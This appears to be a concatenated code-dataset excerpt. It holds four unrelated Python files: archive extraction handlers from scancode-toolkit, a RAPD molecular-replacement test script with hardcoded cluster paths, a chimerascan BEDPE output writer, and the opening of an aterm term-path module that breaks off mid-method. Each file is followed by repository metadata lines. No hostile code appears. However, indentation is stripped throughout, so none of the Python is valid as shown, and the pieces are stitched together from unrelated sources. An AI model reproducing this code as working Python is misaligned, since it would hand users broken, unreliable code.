logger.debug('extract_with_fallback: temp_target2: %(temp_target2)r' % locals())
fileutils.copytree(temp_target2, abs_target_dir)
finally:
fileutils.delete(temp_target2)
finally:
fileutils.delete(temp_target1)
return warnings
def try_to_extract(location, target_dir, extractor):
"""
Extract archive at `location` to `target_dir` trying the `extractor` function.
If extract fails, just return without returning warnings nor raising exceptions.
Note: there are a few cases where we want to attempt extracting something
but do not care if this fails.
"""
abs_location = os.path.abspath(os.path.expanduser(location))
abs_target_dir = unicode(os.path.abspath(os.path.expanduser(target_dir)))
temp_target = unicode(fileutils.get_temp_dir('extract1'))
warnings = []
try:
warnings = extractor(abs_location, temp_target)
if TRACE:
logger.debug('try_to_extract: temp_target: %(temp_target)r' % locals())
fileutils.copytree(temp_target, abs_target_dir)
except:
return warnings
finally:
fileutils.delete(temp_target)
return warnings
# High level aliases to lower level extraction functions
########################################################
extract_tar = libarchive2.extract
extract_patch = patch.extract
extract_deb = libarchive2.extract
extract_ar = libarchive2.extract
extract_msi = sevenzip.extract
extract_cpio = libarchive2.extract
# sevenzip should be best at extracting 7zip but most often libarchive is better first
extract_7z = functools.partial(extract_with_fallback, extractor1=libarchive2.extract, extractor2=sevenzip.extract)
# libarchive is best for the run of the mill zips, but sevenzip sometimes is better
extract_zip = functools.partial(extract_with_fallback, extractor1=libarchive2.extract, extractor2=sevenzip.extract)
extract_springboot = functools.partial(try_to_extract, extractor=extract_zip)
extract_iso = sevenzip.extract
extract_rar = sevenzip.extract
extract_rpm = sevenzip.extract
extract_xz = sevenzip.extract
extract_lzma = sevenzip.extract
extract_squashfs = sevenzip.extract
extract_cab = sevenzip.extract
extract_nsis = sevenzip.extract
extract_ishield = sevenzip.extract
extract_Z = sevenzip.extract
extract_xarpkg = sevenzip.extract
# Archive handlers.
####################
TarHandler = Handler(
name='Tar',
filetypes=('.tar', 'tar archive',),
mimetypes=('application/x-tar',),
extensions=('.tar',),
kind=regular,
extractors=[extract_tar],
strict=False
)
RubyGemHandler = Handler(
name='Ruby Gem package',
filetypes=('.tar', 'tar archive',),
mimetypes=('application/x-tar',),
extensions=('.gem',),
kind=package,
extractors=[extract_tar],
strict=False
)
ZipHandler = Handler(
name='Zip',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.zip', '.zipx',),
kind=regular,
extractors=[extract_zip],
strict=False
)
OfficeDocHandler = Handler(
name='Office doc',
filetypes=('zip archive',),
mimetypes=('application/zip', 'application/vnd.openxmlformats',),
# Extensions of office documents that are zip files too
extensions=(
# ms doc
'.docx', '.dotx', '.docm',
# ms xls
'.xlsx', '.xltx', '.xlsm', '.xltm',
# ms ppt
'.pptx', '.ppsx', '.potx', '.pptm', '.potm', '.ppsm',
# oo write
'.odt', '.odf', '.sxw', '.stw',
# oo calc
'.ods', '.ots', '.sxc', '.stc',
# oo pres and draw
'.odp', '.otp', '.odg', '.otg', '.sxi', '.sti', '.sxd',
'.sxg', '.std',
# star office
'.sdc', '.sda', '.sdd', '.smf', '.sdw', '.sxm', '.stw',
'.oxt', '.sldx',
'.epub',
),
kind=docs,
extractors=[extract_zip],
strict=True
)
AndroidAppHandler = Handler(
name='Android app',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.apk',),
kind=package,
extractors=[extract_zip],
strict=True
)
# see http://tools.android.com/tech-docs/new-build-system/aar-formats
AndroidLibHandler = Handler(
name='Android library',
filetypes=('zip archive',),
mimetypes=('application/zip',),
# note: Apache Axis also uses AAR extensions for plain Jars
extensions=('.aar',),
kind=package,
extractors=[extract_zip],
strict=True
)
MozillaExtHandler = Handler(
name='Mozilla extension',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.xpi',),
kind=package,
extractors=[extract_zip],
strict=True
)
# see https://developer.chrome.com/extensions/crx
# not supported for now
ChromeExtHandler = Handler(
name='Chrome extension',
filetypes=('data',),
mimetypes=('application/octet-stream',),
extensions=('.crx',),
kind=package,
extractors=[extract_7z],
strict=True
)
IosAppHandler = Handler(
name='iOS app',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.ipa',),
kind=package,
extractors=[extract_zip],
strict=True
)
JavaJarHandler = Handler(
name='Java Jar package',
filetypes=('java archive',),
mimetypes=('application/java-archive',),
extensions=('.jar', '.zip',),
kind=package,
extractors=[extract_zip],
strict=False
)
# See https://projects.spring.io/spring-boot/
# this is a ZIP with a shell header (e.g. a self-executing zip of sorts)
# internall the zip is really a war rather than a jar
SpringBootShellJarHandler = Handler(
name='Springboot Java Jar package',
filetypes=('Bourne-Again shell script executable (binary data)',),
mimetypes=('text/x-shellscript',),
extensions=('.jar',),
kind=package,
extractors=[extract_springboot],
strict=False
)
JavaJarZipHandler = Handler(
name='Java Jar package',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.jar',),
kind=package,
extractors=[extract_zip],
strict=False
)
JavaWebHandler = Handler(
name='Java archive',
filetypes=('zip archive',),
mimetypes=('application/zip', 'application/java-archive',),
extensions=('.war', '.sar', '.ear',),
kind=regular,
extractors=[extract_zip],
strict=True
)
PythonHandler = Handler(
name='Python package',
filetypes=('zip archive',),
mimetypes=('application/zip',),
extensions=('.egg', '.whl', '.pyz', '.pex',),
kind=package,
extractors=[extract_zip],
strict=True
)
XzHandler = Handler(
name='xz',
filetypes=('xz compressed',),
mimetypes=('application/x-xz',) ,
extensions=('.xz',),
kind=regular,
extractors=[extract_xz],
strict=False
)
LzmaHandler = Handler(
name='lzma',
filetypes=('lzma compressed',),
mimetypes=('application/x-xz',) ,
extensions=('.lzma',),
kind=regular,
extractors=[extract_lzma],
strict=False
)
TarXzHandler = Handler(
name='Tar xz',
filetypes=('xz compressed',),
mimetypes=('application/x-xz',) ,
extensions=('.tar.xz', '.txz', '.tarxz',),
kind=regular_nested,
extractors=[extract_xz, extract_tar],
strict=False
)
TarLzmaHandler = Handler(
name='Tar lzma',
filetypes=('lzma compressed',),
mimetypes=('application/x-lzma',) ,
extensions=('tar.lzma', '.tlz', '.tarlz', '.tarlzma',),
kind=regular_nested,
extractors=[extract_lzma, extract_tar],
strict=False
)
TarGzipHandler = Handler(
name='Tar gzip',
filetypes=('gzip compressed',),
mimetypes=('application/x-gzip',),
extensions=('.tgz', '.tar.gz', '.tar.gzip', '.targz', '.targzip', '.tgzip',),
kind=regular_nested,
extractors=[extract_tar],
strict=False
)
# https://wiki.openwrt.org/doc/techref/opkg: ipk
# http://downloads.openwrt.org/snapshots/trunk/x86/64/packages/base/
OpkgHandler = Handler(
name='OPKG package',
filetypes=('gzip compressed',),
mimetypes=('application/x-gzip',),
extensions=('.ipk',),
kind=regular_nested,
extractors=[extract_tar],
strict=False
)
GzipHandler = Handler(
name='Gzip',
filetypes=('gzip compressed', 'gzip compressed data'),
mimetypes=('application/x-gzip',),
extensions=('.gz', '.gzip', '.wmz'),
kind=regular,
extractors=[uncompress_gzip],
strict=False
)
DiaDocHandler = Handler(
name='Dia diagram doc',
filetypes=('gzip compressed',),
mimetypes=('application/x-gzip',),
extensions=('.dia',),
kind=docs,
extractors=[uncompress_gzip],
strict=True
)
BzipHandler = Handler(
name='bzip2',
filetypes=('bzip2 compressed',),
mimetypes=('application/x-bzip2',),
extensions=('.bz', '.bz2', 'bzip2',),
kind=regular,
extractors=[uncompress_bzip2],
strict=False
)
TarBzipHandler = Handler(
name='Tar bzip2',
filetypes=('bzip2 compressed',),
mimetypes=('application/x-bzip2',),
extensions=('.tar.bz2', '.tar.bz', '.tar.bzip', '.tar.bzip2',
'.tbz', '.tbz2', '.tb2', '.tarbz2',),
kind=regular_nested,
extractors=[extract_tar],
strict=False
)
RarHandler = Handler(
name='RAR',
filetypes=('rar archive',),
mimetypes=('application/x-rar',),
extensions=('.rar',),
kind=regular,
extractors=[extract_rar],
strict=False
)
CabHandler = Handler(
name='Microsoft cab',
filetypes=('microsoft cabinet',),
mimetypes=('application/vnd.ms-cab-compressed',),
extensions=('.cab',),
kind=package,
extractors=[extract_cab],
strict=True
)
MsiInstallerHandler = Handler(
name='Microsoft MSI Installer',
filetypes=('msi installer',),
mimetypes=('application/x-msi',),
extensions=('.msi',),
kind=package,
extractors=[extract_msi],
strict=True
)
InstallShieldHandler = Handler(
name='InstallShield Installer',
filetypes=('installshield',),
mimetypes=('application/x-dosexec',),
extensions=('.exe',),
kind=special_package,
extractors=[extract_ishield],
strict=True
)
NugetHandler = Handler(
name='Nuget',
# weirdly enough the detection by libmagic is sometimes wrong
# TODO file a bug upstream
# this is due to this: https://en.wikipedia.org/wiki/Open_Packaging_Conventions#File_formats_using_the_OPC
# being recognized by libmagic as an OOXML file
filetypes=('zip archive', 'microsoft ooxml',),
mimetypes=('application/zip', 'application/octet-stream',),
extensions=('.nupkg',),
kind=package,
extractors=[extract_zip],
strict=True
)
NSISInstallerHandler = Handler(
name='Nullsoft Installer',
filetypes=('nullsoft installer',),
mimetypes=('application/x-dosexec',),
extensions=('.exe',),
kind=special_package,
extractors=[extract_nsis],
strict=True
)
ArHandler = Handler(
name='ar archive',
filetypes=('current ar archive',),
mimetypes=('application/x-archive',),
extensions=('.ar',),
kind=regular,
extractors=[extract_ar],
strict=False
)
StaticLibHandler = Handler(
name='Static Library',
filetypes=('current ar archive', 'current ar archive random library',),
mimetypes=('application/x-archive',),
extensions=('.a', '.lib', '.out', '.ka',),
kind=package,
extractors=[extract_ar],
strict=True
)
DebHandler = Handler(
name='Debian package',
filetypes=('debian binary package',),
mimetypes=('application/x-archive', 'application/vnd.debian.binary-package',),
extensions=('.deb', '.udeb',),
kind=package,
extractors=[extract_deb],
strict=True
)
RpmHandler = Handler(
name='RPM package',
filetypes=('rpm ',),
mimetypes=('application/x-rpm',),
extensions=('.rpm', '.srpm', '.mvl', '.vip',),
kind=package,
extractors=[extract_rpm, extract_cpio],
strict=False
)
SevenZipHandler = Handler(
name='7zip',
filetypes=('7-zip archive',),
mimetypes=('application/x-7z-compressed',),
extensions=('.7z',),
kind=regular,
extractors=[extract_7z],
strict=False
)
TarSevenZipHandler = Handler(
name='Tar 7zip',
filetypes=('7-zip archive',),
mimetypes=('application/x-7z-compressed',),
extensions=('.tar.7z', '.tar.7zip', '.t7z',),
kind=regular_nested,
extractors=[extract_7z, extract_tar],
strict=True
)
SharHandler = Handler(
name='shar shell archive',
filetypes=('posix shell script',),
mimetypes=('text/x-shellscript',),
extensions=('.sha', '.shar', '.bin',),
kind=special_package,
extractors=[],
strict=True
)
CpioHandler = Handler(
name='cpio',
filetypes=('cpio archive',),
mimetypes=('application/x-cpio',),
extensions=('.cpio',),
kind=regular,
extractors=[extract_cpio],
strict=False
)
ZHandler = Handler(
name='Z',
filetypes=("compress'd data",),
mimetypes=('application/x-compress',),
extensions=('.z',),
kind=regular,
extractors=[extract_Z],
strict=False
)
TarZHandler = Handler(
name='Tar Z',
filetypes=("compress'd data",),
mimetypes=('application/x-compress',),
extensions=('.tz', '.tar.z', '.tarz',),
kind=regular_nested,
extractors=[extract_Z, extract_tar],
strict=False
)
AppleDmgHandler = Handler(
name='Apple dmg',
filetypes=('zlib compressed',),
mimetypes=('application/zlib',),
extensions=('.dmg', '.sparseimage',),
kind=package,
extractors=[extract_iso],
strict=True
)
ApplePkgHandler = Handler(
name='Apple pkg or mpkg package installer',
filetypes=('xar archive',),
mimetypes=('application/octet-stream',),
extensions=('.pkg', '.mpkg',),
kind=package,
extractors=[extract_xarpkg],
strict=True
)
XarHandler = Handler(
name='Xar archive v1',
filetypes=('xar archive',),
mimetypes=('application/octet-stream',),
extensions=('.xar',),
kind=package,
extractors=[extract_xarpkg],
strict=True
)
IsoImageHandler = Handler(
name='ISO CD image',
filetypes=('iso 9660 cd-rom', 'high sierra cd-rom',),
mimetypes=('application/x-iso9660-image',),
extensions=('.iso', '.udf', '.img',),
kind=file_system,
extractors=[extract_iso],
strict=True
)
SquashfsHandler = Handler(
name='squashfs FS',
filetypes=('squashfs',),
mimetypes=(),
extensions=(),
kind=file_system,
extractors=[extract_squashfs],
strict=False
)
PatchHandler = Handler(
name='Patch',
filetypes=('diff', 'patch',),
mimetypes=('text/x-diff',),
extensions=('.diff', '.patch',),
kind=patches,
extractors=[extract_patch],
strict=True
)
# Actual list of handlers
archive_handlers = [
TarHandler,
RubyGemHandler,
ZipHandler,
OfficeDocHandler,
AndroidAppHandler,
AndroidLibHandler,
MozillaExtHandler,
# not supported for now
# ChromeExtHandler,
IosAppHandler,
JavaJarHandler,
JavaJarZipHandler,
SpringBootShellJarHandler,
JavaWebHandler,
PythonHandler,
XzHandler,
LzmaHandler,
TarXzHandler,
TarLzmaHandler,
TarGzipHandler,
GzipHandler,
DiaDocHandler,
BzipHandler,
TarBzipHandler,
RarHandler,
CabHandler,
MsiInstallerHandler,
ApplePkgHandler,
XarHandler,
# notes: this may catch all exe and fails too often
InstallShieldHandler,
NSISInstallerHandler,
NugetHandler,
ArHandler,
StaticLibHandler,
DebHandler,
RpmHandler,
SevenZipHandler,
TarSevenZipHandler,
# not supported for now
# SharHandler,
CpioHandler,
ZHandler,
TarZHandler,
AppleDmgHandler,
IsoImageHandler,
SquashfsHandler,
PatchHandler
]
|
yashdsaraf/scancode-toolkit
|
src/extractcode/archive.py
|
Python
|
apache-2.0
| 29,018
|
[
"VisIt"
] |
a06404caf027f05aa1704f61f7bbf06a3735075a456d57839e684c0845aff353
|
import utils.archive as archive
import os, sys
import shutil
from pprint import pprint
import importlib
import random
import json
import time
from multiprocessing import Queue, Process
import logging
import logging.handlers
from utils.processes import local_subprocess, mp_pool
#from utils.xutils import convert_unicode
import utils.xutils as xutils
import utils.log
# The pdbquery plugin
#logger = logging.getLogger("RAPDLogger")
#logger.debug("__init__")
#LOG_FILENAME = '/gpfs6/users/necat/Jon/RAPD_test/Output/rapd.log'
#logger = logging.getLogger("RAPDLogger")
#logger.debug("__init__")
## Add the log message handler to the logger
#handler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=100000, backupCount=5)
##add a formatter
#formatter = logging.Formatter("%(asctime)s - %(message)s")
#handler.setFormatter(formatter)
#logger.addHandler(handler)
# Set up logging
logger = utils.log.get_logger(logfile_dir="/gpfs6/users/necat/Jon/RAPD_test/Output",
logfile_id="rapd_mr",
level=1,
#console=commandline_args.test
console=False)
# Setup cluster
import sites.necat as site
from utils.modules import load_module
cluster_launcher = load_module(site.CLUSTER_ADAPTER)
launcher = cluster_launcher.process_cluster
# Setup local_subprocess
#launcher = local_subprocess
# Setup redis
redis_database = importlib.import_module('database.redis_adapter')
#redis_database = redis_database.Database(settings=site.CONTROL_DATABASE_SETTINGS)
redis = redis_database.Database(settings=site.CONTROL_DATABASE_SETTINGS)
#redis = redis_database.connect_to_redis()
"""
cif = '/gpfs6/users/necat/rapd2/integrate/2018-06-06/JDO_PUCK2_A14_Run4_1/rapd_pdbquery_JDO_PUCK2_A14_Run4_1_free/Phaser_1Z7E/1z7e.cif'
l = ['2FGE_E', '2FGE']
for i in l:
print i.split('_')[0]
print len(i.split('_'))
if len(i.split('_')) not in [1]:
print 'gh'
from plugins.subcontractors.rapd_cctbx import get_pdb_info
pdb_info = get_pdb_info(#cif_file='/gpfs6/users/necat/rapd2/integrate/2018-06-06/JDO_PUCK2_A14_Run4_1/rapd_pdbquery_JDO_PUCK2_A14_Run4_1_free/Phaser_1Z7E/1z7e.cif',
#cif_file='/gpfs6/users/necat/Jon/RAPD_test/Output/2yep.cif',
cif_file='/gpfs6/users/necat/Jon/RAPD_test/Pdb/thau.pdb',
dres=6.0,
matthews=True,
chains=False,
#data_file='/gpfs6/users/necat/rapd2/integrate/2018-06-05/JDO_PUCK2_A14_Run4_1/JDO_PUCK2_A14_Run4_1/JDO_PUCK2_A14_Run4_1_free.mtz',
#data_file='/gpfs5/users/necat/rapd/copper/trunk/integrate/2018-06-07/P113_11_1/P113_11_1/P113_11_1_free.mtz',
data_file = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
)
pprint(pdb_info)
"""
"""
from plugins.subcontractors.rapd_phaser import run_phaser_module
tncs = run_phaser_module(data_file='/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz',
tncs=True)
print tncs
"""
"""
# Cleanup Redis
l = redis.keys('Phaser_*')
for k in l:
redis.delete(k)
print redis.keys('Phaser_*')
print redis.get('Phaser_8858')
#os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output/Phaser_test/rapd_pdbquery_P113_11_1_free')
#pprint(json.loads(open('result.json', 'r').read()))
from plugins.subcontractors.rapd_cctbx import get_pdb_info, get_mtz_info
mtz = '/gpfs5/users/necat/rapd/copper/trunk/integrate/2018-06-07/P113_11_1/P113_11_1/P113_11_1_free.mtz'
input_spacegroup, cell, volume = get_mtz_info(mtz)
input_spacegroup_num = xutils.convert_spacegroup(input_spacegroup)
print xutils.get_sub_groups(input_spacegroup_num, "simple")
"""
"""
# RUN Analysis
import plugins.analysis.plugin
import plugins.analysis.commandline
# Construct the pdbquery plugin command
class AnalysisArgs(object):
#Object containing settings for plugin command construction
clean = True
#datafile = '/gpfs6/users/necat/Jon/process/rapd/integrate/ehdbr1_7rna_1/ehdbr1_7rna_free.mtz'
datafile = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
dir_up = False
json = False
nproc = 8
#pdbquery = True #TODO
progress = False
#queue = plugin_queue
run_mode = 'server'
sample_type = "default"
show_plots = False
test = False
computer_cluster = True
db_settings = site.CONTROL_DATABASE_SETTINGS
analysis_command = plugins.analysis.commandline.construct_command(AnalysisArgs)
# The analysis plugin
plugin = plugins.analysis.plugin
# Run the plugin
plugin_instance = plugin.RapdPlugin(analysis_command,
launcher=launcher,
tprint=False,
logger=logger)
plugin_instance.start()
#analysis_result = plugin_queue.get()
#print analysis_result
"""
"""
# RUN PDBQuery
import plugins.pdbquery.plugin
import plugins.pdbquery.commandline
os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output/Phaser_test')
#launcher = local_subprocess
# Construct the pdbquery plugin command
class PdbqueryArgs(object):
#Object for command construction
clean = True
#datafile = '/gpfs5/users/necat/rapd/copper/trunk/integrate/2018-06-07/P113_11_1/P113_11_1/P113_11_1_free.mtz'
#data_file = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
#data_file = '/gpfs6/users/necat/Jon/RAPD_test/Output/thaum1_01s-01d_1_mergable.mtz'
data_file = '/gpfs6/users/necat/Jon/RAPD_test/Output/thau_free.mtz'
dir_up = False
json = False
nproc = 2
progress = False
run_mode = 'server'
pdbs = False
#pdbs = ['1111', '2qk9']
contaminants = True
##run_mode = None
search = True
test = True
#verbose = True
#no_color = False
db_settings = site.CONTROL_DATABASE_SETTINGS
#output_id = False
exchange_dir = '/gpfs6/users/necat/rapd2/exchange_dir'
pdbquery_command = plugins.pdbquery.commandline.construct_command(PdbqueryArgs)
# The pdbquery plugin
plugin = plugins.pdbquery.plugin
# Run the plugin
plugin_instance = plugin.RapdPlugin(site=site,
command=pdbquery_command,
logger=logger)
plugin_instance.start()
"""
"""
data_file = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
pdb = '/gpfs6/users/necat/Jon/RAPD_test/Output/rapd_mr_thau_free/P41212_all_0/P41212_all_0.1.pdb'
mtz = '/gpfs6/users/necat/Jon/RAPD_test/Output/rapd_mr_thau_free/P41212_all_0/P41212_all_0.1.mtz'
os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output/rapd_mr_thau_free/P41212_all_0')
adf_results = xutils.calc_ADF_map(data_file=data_file,
mtz=mtz,
pdb=pdb)
print adf_results
"""
"""
#RUN MR
import plugins.mr.plugin
import plugins.mr.commandline
import uuid
os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output/Phaser_test')
#launcher = local_subprocess
# Construct the pdbquery plugin command
class MRArgs(object):
#Object for command construction
clean = False
#datafile = '/gpfs5/users/necat/rapd/copper/trunk/integrate/2018-06-07/P113_11_1/P113_11_1/P113_11_1_free.mtz'
data_file = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
struct_file = '/gpfs6/users/necat/Jon/RAPD_test/Pdb/thau.pdb'
dir_up = False
json = False
nproc = 11
adf = False
progress = False
run_mode = 'server'
#pdbs = False
#pdbs = ['1111', '2qk9']
#contaminants = True
##run_mode = None
#search = True
test = False
#verbose = True
#no_color = False
db_settings = site.CONTROL_DATABASE_SETTINGS
#output_id = False
exchange_dir = '/gpfs6/users/necat/rapd2/exchange_dir'
mr_command = plugins.mr.commandline.construct_command(MRArgs)
# The pdbquery plugin
plugin = plugins.mr.plugin
# Run the plugin
plugin_instance = plugin.RapdPlugin(site=site,
command=mr_command)
plugin_instance.start()
"""
from plugins.subcontractors.rapd_phaser import run_phaser
# Setup local_subprocess
launcher = local_subprocess
pool = mp_pool(1)
os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output')
job_description = {
#"work_dir": '/gpfs6/users/necat/Jon/RAPD_test/Output/Phaser_test',
"work_dir": '/gpfs6/users/necat/rapd2/integrate/2020-10-14/SAD020_16_1/rapd_pdbquery_SAD020_16_1_free/Phaser_4NPR',
"data_file": '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz',
"data_file": '',
#"cif": "/gpfs5/users/necat/rapd/pdbq/pdb/th/1thw.cif",
#"pdb": "/gpfs6/users/necat/Jon/RAPD_test/Pdb/thau.pdb",
"pdb": "/gpfs6/users/necat/Jon/RAPD_test/Pdb/thau.pdb",
"struct_file": '/gpfs6/users/necat/rapd2/integrate/2020-10-14/SAD020_16_1/rapd_pdbquery_SAD020_16_1_free/Phaser_4NPR/4npr.cif',
#"name": 'junk',
"name": '4NPR',
#"spacegroup": 'P422',
"spacegroup": 'P222',
"ncopy": 1,
"test": False,
"cell_analysis": True,
"large_cell": False,
"resolution": 6.0,
#"timeout": self.phaser_timer,
#"launcher": self.command["preferences"].get("launcher", False)
"launcher": launcher,
"computer_cluster": False,
"pool": pool,
#"results_queue": queue,
"db_settings": site.CONTROL_DATABASE_SETTINGS,
"output_id": False
}
#Thread(target=run_phaser_pdbquery, kwargs=job_description).start()
job, pid, output_id = run_phaser(**job_description)
print job
#print job.ready()
while not job.ready():
print 'sleeping...'
time.sleep(1)
print job.successful()
#print dir(job)
#print pid
#print job.get()
#print output_id
pool.close()
pool.join()
|
RAPD/RAPD
|
src/test2.py
|
Python
|
agpl-3.0
| 10,111
|
[
"ADF"
] |
cea75baf3b4520dd82b4292153ca63f63f62e9cddd32450f3f49c2b3a1b12f57
|
'''
Created on Jul 1, 2011
@author: mkiyer
chimerascan: chimeric transcript discovery using RNA-seq
Copyright (C) 2011 Matthew Iyer
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import logging
import os
import sys
import operator
import collections
import pysam
from chimerascan.lib.chimera import Chimera, get_chimera_type
from chimerascan.lib.feature import TranscriptFeature
from chimerascan.lib import config
from chimerascan.lib.transcriptome import build_transcript_genome_map, \
build_genome_transcript_trees, build_transcript_map, transcript_to_genome_pos
from chimerascan.pipeline.filter_chimeras import get_wildtype_frags
def get_chimera_groups(input_file, tx_id_map):
# group chimeras in the same genomic cluster with the same
# breakpoint
cluster_chimera_dict = collections.defaultdict(lambda: [])
for c in Chimera.parse(open(input_file)):
# get cluster of overlapping genes
cluster5p = tx_id_map[c.tx_name_5p].cluster_id
cluster3p = tx_id_map[c.tx_name_3p].cluster_id
# add to dictionary
cluster_chimera_dict[(cluster5p,cluster3p)].append(c)
for key,chimeras in cluster_chimera_dict.iteritems():
yield key,chimeras
def get_best_coverage_chimera(chimeras):
stats = []
for c in chimeras:
# TODO: come up with a way to prioritize here (spanning included?)
stats.append((c,
c.get_num_unique_positions(),
c.get_num_frags()))
sorted_stats = sorted(stats, key=operator.itemgetter(1,2), reverse=True)
return sorted_stats[0][0]
def write_output(input_file, bam_file, output_file, index_dir):
# read transcripts
logging.debug("Reading transcripts")
transcript_file = os.path.join(index_dir, config.TRANSCRIPT_FEATURE_FILE)
transcripts = list(TranscriptFeature.parse(open(transcript_file)))
# build a lookup table to get genome coordinates from transcript
# coordinates
transcript_genome_map = build_transcript_genome_map(transcripts)
tx_id_map = build_transcript_map(transcripts)
genome_tx_trees = build_genome_transcript_trees(transcripts)
# open BAM file for checking wild-type isoform
bamfh = pysam.Samfile(bam_file, "rb")
# group chimera isoforms together
lines = []
chimera_clusters = 0
for key,chimeras in get_chimera_groups(input_file, tx_id_map):
txs5p = set()
txs3p = set()
genes5p = set()
genes3p = set()
names = set()
for c in chimeras:
txs5p.add("%s:%d-%d" % (c.tx_name_5p, c.tx_start_5p, c.tx_end_5p-1))
txs3p.add("%s:%d-%d" % (c.tx_name_3p, c.tx_start_3p, c.tx_end_3p-1))
genes5p.add(c.gene_name_5p)
genes3p.add(c.gene_name_3p)
names.add(c.name)
c = get_best_coverage_chimera(chimeras)
# get chimera type and distance between genes
chimera_type, distance = get_chimera_type(tx_id_map[c.tx_name_5p],
tx_id_map[c.tx_name_3p],
genome_tx_trees)
# get genomic positions of chimera
chrom5p,strand5p,start5p = transcript_to_genome_pos(c.tx_name_5p, c.tx_start_5p, transcript_genome_map)
chrom5p,strand5p,end5p = transcript_to_genome_pos(c.tx_name_5p, c.tx_end_5p-1, transcript_genome_map)
if strand5p == 1:
start5p,end5p = end5p,start5p
chrom3p,strand3p,start3p = transcript_to_genome_pos(c.tx_name_3p, c.tx_start_3p, transcript_genome_map)
chrom3p,strand3p,end3p = transcript_to_genome_pos(c.tx_name_3p, c.tx_end_3p-1, transcript_genome_map)
if strand3p == 1:
start3p,end3p = end3p,start3p
# get breakpoint spanning sequences
spanning_seqs = set()
spanning_fasta_lines = []
for dr in c.get_spanning_reads():
if dr.seq in spanning_seqs:
continue
spanning_seqs.add(dr.seq)
spanning_fasta_lines.extend([">%s/%d;pos=%d;strand=%s" %
(dr.qname, dr.readnum+1, dr.pos,
"-" if dr.is_reverse else "+"),
dr.seq])
# get isoform fraction
num_wt_frags_5p, num_wt_frags_3p = get_wildtype_frags(c, bamfh)
num_chimeric_frags = c.get_num_frags()
frac5p = float(num_chimeric_frags) / (num_chimeric_frags + num_wt_frags_5p)
frac3p = float(num_chimeric_frags) / (num_chimeric_frags + num_wt_frags_3p)
# setup fields of BEDPE file
fields = [chrom5p, start5p, end5p,
chrom3p, start3p, end3p,
"CLUSTER%d" % (chimera_clusters),
c.get_num_frags(),
"+" if (strand5p == 0) else "-",
"+" if (strand3p == 0) else "-",
','.join(txs5p),
','.join(txs3p),
','.join(genes5p),
','.join(genes3p),
chimera_type, distance,
c.get_num_frags(),
c.get_num_spanning_frags(),
c.get_num_unique_positions(),
frac5p, frac3p,
','.join(spanning_fasta_lines),
','.join(names)]
lines.append(fields)
chimera_clusters += 1
bamfh.close()
logging.debug("Clustered chimeras: %d" % (chimera_clusters))
# sort
lines = sorted(lines, key=operator.itemgetter(18, 17, 16), reverse=True)
f = open(output_file, "w")
print >>f, '\t'.join(['#chrom5p', 'start5p', 'end5p',
'chrom3p', 'start3p', 'end3p',
'chimera_cluster_id', 'score',
'strand5p', 'strand3p',
'transcript_ids_5p', 'transcript_ids_3p',
'genes5p', 'genes3p',
'type', 'distance',
'total_frags',
'spanning_frags',
'unique_alignment_positions',
'isoform_fraction_5p',
'isoform_fraction_3p',
'breakpoint_spanning_reads',
'chimera_ids'])
for fields in lines:
print >>f, '\t'.join(map(str, fields))
f.close()
return config.JOB_SUCCESS
def main():
from optparse import OptionParser
logging.basicConfig(level=logging.DEBUG,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
parser = OptionParser("usage: %prog [options] <index_dir> <in.txt> <bam_file> <out.txt>")
options, args = parser.parse_args()
index_dir = args[0]
input_file = args[1]
bam_file = args[2]
output_file = args[3]
return write_output(input_file, bam_file, output_file, index_dir)
if __name__ == "__main__":
sys.exit(main())
|
tectronics/chimerascan
|
chimerascan/deprecated/write_output_v1.py
|
Python
|
gpl-3.0
| 7,533
|
[
"pysam"
] |
851f13ee7ab4dee597822cf8f5f9a4d1ffd85892db5ef3921f84ca64136cfc09
|
'''Term paths.'''
import itertools
from aterm.factory import factory
from aterm import types
from aterm import visitor
from aterm import project
from aterm import annotation
PRECEDENT = -2
ANCESTOR = -1
EQUAL = 0
DESCENDENT = 1
SUBSEQUENT = 2
class _Transformer(visitor.IncrementalVisitor):
def __init__(self, index, func):
visitor.IncrementalVisitor.__init__(self)
self.index = index
self.func = func
def __call__(self, term):
return self.visit(term, 0)
def visitTerm(self, term, index):
raise TypeError('not a term list or application', term)
def visitNil(self, term, index):
raise IndexError('index out of range', index)
def visitHead(self, term, index):
if index == self.index:
return self.func(term)
else:
return term
def visitTail(self, term, index):
if index >= self.index:
return term
else:
return self.visit(term, index + 1)
def visitAppl(self, term, index):
old_arg = term.args[self.index]
new_arg = self.func(old_arg)
if new_arg is not old_arg:
args = list(term.args)
args[self.index] = new_arg
return term.factory.makeAppl(term.name, args, term.annotations)
else:
return term
class Path(object):
'''A path is a term comprehending a list of integer indexes which indicate
the position of a term relative to the root term.
When a path is read/written to a string/list, indexes are listed ordely from
the root to the leaves. However, when a path is read/written to a term, the
indexes are from the leaves to the root, to take advantage of the maximal
sharing.
'''
__slots__ = ['indices']
def __init__(self, indices):
self.indices = indices
def compare(self, other):
'''Rich path comparison.'''
assert isinstance(other, Path)
